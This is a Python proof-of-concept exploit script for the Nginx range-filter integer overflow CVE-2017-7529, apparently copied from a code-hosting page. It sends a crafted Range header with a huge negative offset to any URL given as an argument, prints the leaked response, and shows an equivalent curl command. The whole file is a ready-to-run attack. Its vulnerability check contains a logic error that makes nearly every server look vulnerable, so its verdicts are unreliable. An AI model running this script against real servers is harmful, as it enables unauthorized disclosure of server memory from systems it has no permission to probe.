/
cve-2017-7529.py
77 lines (61 loc) · 2.31 KB
/
cve-2017-7529.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
# Exploit Title: Nginx Remote Integer OverFlow
# Date: 07/13/2017
# Exploit Author: Liam G
# Vendor Homepage: https://www.nginx.com/
# Software Link: https://nginx.org/download/nginx-1.13.2.zip
# Version: 1.13.2
# Tested on: Debian linux 9
# CVE : CVE-2017-7529
import requests
import logging
import sys
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
def send_http_request(url, headers={}, timeout=8.0):
try:
httpResponse = requests.get(url, headers=headers, timeout=timeout)
httpHeaders = httpResponse.headers
log.info("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', ''))
return httpResponse
except requests.exceptions.SSLError:
log.error("SSL error")
except requests.exceptions.HTTPError:
log.error("HTTP error")
except requests.exceptions.Timeout:
log.error("request Timed out")
def exploit(url):
try:
log.info("target: %s", url)
httpResponse = send_http_request(url)
content_length = httpResponse.headers.get('Content-Length', 0)
bytes_length = int(content_length) + 623
content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)
content_range = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)
curl_request = f"curl -H 'Range: {content_range}' {url}"
print(curl_request)
httpResponse = send_http_request(url, headers={ 'Range': content_length })
print(httpResponse.text)
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text or httpResponse.headers:
print("\n")
print("-"*60)
print("proof of concept:".upper())
print("-"*60)
print("\n")
for i in httpResponse.headers.items():
print(i)
print(httpResponse.text)
print("-"*60)
log.info("[+] Vulnerable to CVE-2017-7529")
print("\n")
else:
log.info("[?] Unknown Vulnerable")
print("\n")
except Exception:
log.error("SOMETHING WENT WRONG")
print("\n")
if __name__ == '__main__':
if len(sys.argv) != 2:
print("[*] %s <url>" % sys.argv[0])
sys.exit(1)
url = sys.argv[1]
exploit(url)